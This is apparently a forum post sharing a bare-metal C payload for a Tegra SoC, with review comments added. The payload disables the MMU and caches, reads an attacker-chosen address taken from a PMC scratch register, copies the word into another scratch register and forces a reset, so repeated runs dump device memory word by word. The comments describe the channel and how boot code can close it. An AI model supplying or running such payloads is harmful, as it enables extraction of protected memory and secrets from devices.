These payloads may not work; I honestly have no clue. I attached them, and there are also 2 helper py scripts that might work with some of these payloads.
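/*
 * Memory-mapped register addresses used by _start().
 *
 * NOTE(review): the base address and offsets match the PMC (power management
 * controller) block of NVIDIA Tegra SoCs; confirm against the reference
 * manual of the actual target before relying on these names.
 *
 * Security relevance: _start() uses the two scratch registers as a mailbox
 * whose contents are expected to be readable after a reset. Boot firmware
 * that reads these registers should treat their contents as untrusted input.
 */
#define PMC_BASE 0x7000e400
#define PMC_CNTRL (PMC_BASE + 0x0)     /* control register; _start() sets bit 4 */
#define PMC_SCRATCH0 (PMC_BASE + 0x50) /* receives the 32-bit word that was read */
#define PMC_SCRATCH1 (PMC_BASE + 0x54) /* holds the address to read / next address */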
/*
 * Bare-metal entry point: copies one 32-bit word of memory into PMC_SCRATCH0
 * and then sets bit 4 of PMC_CNTRL.
 *
 * Sequence, as written:
 *   1. Mask IRQ/FIQ, switch the CPU to Supervisor mode, and clear the MMU and
 *      D-cache enable bits in the CP15 control register.
 *   2. Read an address from PMC_SCRATCH1; if it is outside
 *      [0x40000000, 0xFFF10000] fall back to 0x40000000.
 *   3. Load the word at that address, store it in PMC_SCRATCH0, and store
 *      address + 4 back into PMC_SCRATCH1.
 *   4. Set bit 4 of PMC_CNTRL and spin forever.
 *
 * NOTE(review): bit 4 of PMC_CNTRL is presumably the main-reset request, so
 * each run would expose a single word and advance the cursor by four bytes;
 * confirm against the SoC documentation.
 *
 * Defensive relevance: the design only works if the scratch registers and the
 * control register are writable from this execution context and the scratch
 * contents are still readable after the reset. Early boot code can close that
 * channel by clearing or write-locking scratch registers it does not need and
 * by validating any scratch value before using it.
 *
 * NOTE(review): the inline assembly modifies r0, CPSR and the CP15 control
 * register without declaring any clobbers, so the compiler is not told about
 * these side effects.
 */
void _start() {
    __asm__ volatile(
        /* CPSR: mask interrupts and force Supervisor mode. */
        "mrs r0, cpsr\n"
        "orr r0, r0, #0xc0\n"       // set the I and F bits (IRQ/FIQ masked)
        "bic r0, r0, #0x1f\n"       // wipe the mode field
        "orr r0, r0, #0x13\n"       // mode = Supervisor (SVC)
        "msr cpsr, r0\n"

        /* CP15 c1 control register: turn off address translation and D-cache. */
        "mrc p15, 0, r0, c1, c0, 0\n"
        "bic r0, r0, #0x0001\n"     // clear MMU enable
        "bic r0, r0, #0x0004\n"     // clear D-cache enable
        "mcr p15, 0, r0, c1, c0, 0\n");

    volatile unsigned int *const scratch0 = (volatile unsigned int *)PMC_SCRATCH0;
    volatile unsigned int *const scratch1 = (volatile unsigned int *)PMC_SCRATCH1;
    volatile unsigned int *const cntrl = (volatile unsigned int *)PMC_CNTRL;

    /* The read cursor arrives in SCRATCH1; it is range-checked before use. */
    unsigned int addr = *scratch1;
    if (!(addr >= 0x40000000 && addr <= 0xFFF10000)) {
        addr = 0x40000000;
    }

    /* Publish the word at the cursor, then advance the cursor by one word. */
    unsigned int word = *(unsigned int *)addr;
    *scratch0 = word;
    *scratch1 = addr + 4;

    /* Read-modify-write of the control register: set bit 4. */
    *cntrl = *cntrl | (1 << 4);

    /* Nothing left to do; wait here. */
    for (;;) {
    }
}